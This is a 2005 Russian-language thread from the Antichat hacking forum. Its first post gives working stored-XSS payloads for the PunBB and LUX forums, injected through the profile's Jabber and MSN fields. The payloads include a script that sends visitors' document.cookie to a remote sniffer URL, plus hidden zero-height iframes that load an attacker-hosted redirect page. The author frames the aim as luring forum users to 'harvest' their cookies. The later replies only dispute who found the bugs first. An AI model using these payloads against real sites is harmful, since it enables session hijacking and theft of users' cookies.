ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в форумах PunBB и LUX
  #1  
Старый 22.03.2005, 23:23
Аватар для PinkPanther
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию XSS в форумах PunBB и LUX

И опять дыра в профиле....что в принципе хорошо, для нас=)

1 уязвимость найдена мной в форуме punbb, позволяет вставить скрипт, в поле Jabber, что находится в профиле.
Так как длинна ограничена 75 символами, следует кроме банального алерта
Код:
"><script>alert('')</script>
стандартный скрипт для пересылки куков на снифф
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
вставить как бы и не удастся. Но мы поступим по другому. Зарегестрируем, к примеру, на .holm`e такой сайт: r.h15.ru
и в корневую папку кинем html`овский файл index.html, со строкой
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
т.е. сделаем небольшой редирект на античатовский сниффер. Теперь, поместив в поле Jabber строку с невидимым фреймом
Код:
"><iframe src=http://r.h15.ru/index.html height=0></iframe>
в котором отображается страница нашего редиректа, кукисы всех кто заглянет на эту страницу улетят на снифф античата.
Осталось только заманить пользователей форума заглянуть в твой профайл, и можно идти собирать урожай=)



2 уязвимость найдена в форуме lux. Форум итальянский, и довольно распостраненный, у итальянцев.
Тут, поле подверженное нашему воздействию называется MSN, количество вводимых символов ограничено 40, вставляем сплойт
Код:
"><iframe src=http://r.15.ru/ height=0>
который занимает как раз 38 символа, и добываем кукисы.
 
Ответить с цитированием

  #2  
Старый 23.03.2005, 17:42
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

Вообщето, это было на securitylab.ru...
 
Ответить с цитированием

  #3  
Старый 23.03.2005, 20:37
Аватар для PinkPanther
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию

Цитата:
Сообщение от KEZ  
Вообщето, это было на securitylab.ru...
Я тебе отвечаю, эти баги я нашел еще в конце февраля, до всяких там публикаций на секлабе. Релизить особо не спешил, думал может ещё что-то найду в них, но так как секлаб подосрал немного.........=(

Баги нашел я, и нашел я их до публикации на секлабе, следует описать их тут я имею право.
 
Ответить с цитированием

  #4  
Старый 30.03.2005, 14:38
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию

А вот какой я крутой! )) (щутка)
я там нашел вложеные теги. Сейчас сделаем видео...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ